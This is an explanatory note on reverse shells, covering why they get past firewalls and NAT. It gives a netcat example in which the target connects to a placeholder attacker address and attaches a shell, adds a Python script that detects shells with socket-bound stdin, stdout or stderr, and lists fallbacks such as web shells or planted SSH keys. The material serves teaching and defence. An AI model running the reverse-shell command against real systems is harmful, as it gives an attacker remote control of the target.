A reverse shell works in the opposite manner to a bind shell: the attacker's machine listens instead of the target's. A reverse shell is defined as follows:

  • The attacker machine listens on a local port.
  • The target machine connects to the attacker, sending an interactive shell with it.

Or more briefly: the remote host connects to your host and sends it a shell.

Advantage over bind shell

Reverse shells are used more widely than bind shells during the penetration stage because they get past basic firewalls more easily. Making an outbound connection is easier than listening on a port, since firewalls tend not to restrict outbound traffic. Reverse shells also get around NAT on the remote host.

An example of a reverse shell with netcat:

# Attacker: listen on a local port and wait for the callback
nc -lvp $PORT

# Target: connect back and attach an interactive shell to the connection
# (-e is not available in every netcat build; the OpenBSD nc lacks it)
nc $ATTACKER_IP $PORT -e $SHELL
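The `-e $SHELL` step above works by handing the shell a TCP socket as its stdin, stdout and stderr, and that is also the cleanest way to spot one from the defender's side: an interactive shell normally has a pty or a pipe on those descriptors, never a socket. The following is an added detection example, not code from the original note. It reads the real `/proc/<pid>/comm` and `/proc/<pid>/fd/{0,1,2}` layout on Linux, while the `SAMPLE` snapshots are constructed data so the check runs offline; the shell-name list and the helper names are this example's own choices.

```python
"""Flag shell processes whose standard streams are attached to a socket.

A reverse shell started with `nc -e $SHELL` (or the bash /dev/tcp trick)
leaves the shell's fd 0/1/2 pointing at the same TCP socket.  A legitimate
interactive shell has a pty (/dev/pts/N) or a pipe there instead.
Added example; not part of the original note.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Process names (as in /proc/<pid>/comm) we treat as shells.  Assumption for
# this example; extend it for the shells present on your hosts.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "fish"}

# readlink(/proc/<pid>/fd/N) yields "socket:[<inode>]" for a socket.
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


@dataclass
class ProcSnapshot:
    pid: int
    comm: str                                   # process name
    fds: Dict[int, str] = field(default_factory=dict)  # fd -> link target


def is_reverse_shell_candidate(proc: ProcSnapshot) -> bool:
    """True when a shell has a socket on stdin, stdout or stderr."""
    if proc.comm not in SHELL_NAMES:
        return False
    return any(SOCKET_RE.match(proc.fds.get(n, "")) for n in (0, 1, 2))


def scan(snapshots: List[ProcSnapshot]) -> List[int]:
    """Return the PIDs of every candidate in a list of snapshots."""
    return [p.pid for p in snapshots if is_reverse_shell_candidate(p)]


def snapshot_proc(pid: int) -> ProcSnapshot:
    """Build a snapshot of a live process from /proc (Linux only)."""
    base = f"/proc/{pid}"
    with open(f"{base}/comm") as f:
        comm = f.read().strip()
    fds: Dict[int, str] = {}
    for n in (0, 1, 2):
        try:
            fds[n] = os.readlink(f"{base}/fd/{n}")
        except OSError:
            pass  # closed fd, or no permission to read it
    return ProcSnapshot(pid, comm, fds)


def scan_live() -> List[int]:
    """Walk /proc and return candidate PIDs (run as root to see all fds)."""
    found = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            proc = snapshot_proc(int(name))
        except OSError:
            continue  # process exited or is not readable
        if is_reverse_shell_candidate(proc):
            found.append(proc.pid)
    return found


# Constructed sample snapshots (not captured from a real host).
SAMPLE = [
    # normal interactive shell on a pty
    ProcSnapshot(1234, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    # shell with all three streams on one socket: the `nc -e` pattern
    ProcSnapshot(2345, "sh", {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}),
    # interpreter with a socket on stdin: not a shell by name, so not flagged
    ProcSnapshot(3456, "python3", {0: "socket:[48300]", 1: "socket:[48300]", 2: "/dev/null"}),
    # shell run from a script with pipes: benign
    ProcSnapshot(4567, "bash", {0: "pipe:[9901]", 1: "pipe:[9902]", 2: "/dev/pts/1"}),
]

if __name__ == "__main__":
    print("candidates in sample:", scan(SAMPLE))
```

Only PID 2345 is reported for the sample. The `python3` entry shows the limit of a name-based filter: an interpreter that duplicates a socket onto its own descriptors and then spawns a shell is only caught once the child shell appears, so in practice pair this with parent/child process lineage and with egress monitoring for unexpected outbound connections, since the outbound direction is exactly what lets reverse shells through the firewall.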

NAT on attacking host?

When the attacking host is behind a NAT (and you don't have access to a public IP, a port forward, a VPS, etc.) and is not on the same LAN as the remote host, reverse shells might not be viable, but you can use other methods such as dropping an SSH key, a web shell, etc.